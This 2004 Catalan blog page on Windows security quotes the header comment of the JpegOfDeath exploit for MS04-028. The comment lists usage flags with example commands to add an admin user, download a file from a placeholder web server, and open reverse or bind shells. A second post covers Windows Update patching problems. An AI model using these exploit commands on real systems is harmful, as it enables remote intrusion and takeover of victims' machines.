Última actualització: 20/10/2004; 07:01:19
Secció sobre Windows
Comentaris relacionats amb Windows, amb especial èmfasi en els aspectes de seguretat informàtica.
        

Enllaços
en finestra nova
Contingut actualitzat


Categories




Contingut antic
(ja no s'actualitza)


Articles
(fins maig 2003)



Versions anteriors
d'aquesta pàgina

Arxiu

diumenge, 3 / octubre / 2004


JpegOfDeath.c, exploit utilitzatble de forma remota per a la vulnerabilitat MS04-028:
/*
* Exploit Name:
* =============
*  JpegOfDeath.M.c v0.6.a All in one Bind/Reverse
*        /Admin/FileDownload
* =============
* Tweaked Exploit By M4Z3R For GSO
* All Credits & Greetings Go To:
* ==========
* (...)
* ===========
* Flags Usage:
* -a: Add User X with Pass X to Admin Group; 
*  IE: Exploit.exe -a pic.jpg 
* -d: Download a File From an HTTP Server;
*  IE: Exploit.exe -d http://YourWebServer/
*        Patch.exe pic.jpg
* -r: Send Back a Shell To a Specified IP on a 
*        Specific Port;
*  IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg 
*        (Default Port is 1337)
* -b: Bind a Shell on The Exploited Machine On a 
*        Specific Port;
*  IE: Exploit.exe -b -p 132 pic.jpg (Default Port 
*        is 1337)
*/
 
Ara la pregunta es saber quan això començarà a ser utilitzat de forma massiva per virus i cucs.


15:46 (# Enllaç permanent) | |


Fa unes tres setmanes ja vaig indicar l'existència de problemes amb el Windows Update (que només afectaven a la versió en català i que ja han estat solucionats per Microsoft). Ara Jon Udell també comenta els problemes originats per la última vulnerabilitat crítica de Windows (MS04-028) i la confusió alhora d'aplicar els pegats.


15:42 (# Enllaç permanent) | |

© Copyright 2003-2004 Xavier Caballe. . El contingut d'aquest weblog és responsabilitat única i exclusivament del seu autor i no té cap relació amb les seves activitats professionals.

350

Octubre 2004
Diu Dil Dim Dim Dij Div Dis
          1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
31            
Set   Nov



Subscribe to "Secció sobre Windows" in Radio UserLand.

Click to see the XML version of this web page.






Creative Commons License

Wishlist

Webs d'amics
jcea
Vicent Partal
Jordi Mas
Toni Hermoso
Mercè Molist
Mina Nabona-Jassans

Gurus
Scripting News
Jon Udell
Bruce Sterling
Bruce Schneier
Howard Rheingold
Reflexiones e irreflexiones
Atalaya
Cuaderno de bitácora
Linotipo
Pedro Jorge Romero

Seguretat
reversing.org
Seguridad de la información
Somiatruites, Ciberderechos
     en la red

eN Espiral ~> Juanma Merino
Navega seguro

PDA
CosesPalm
PalmCat
CanalPDA.com

Cultura
El Llibreter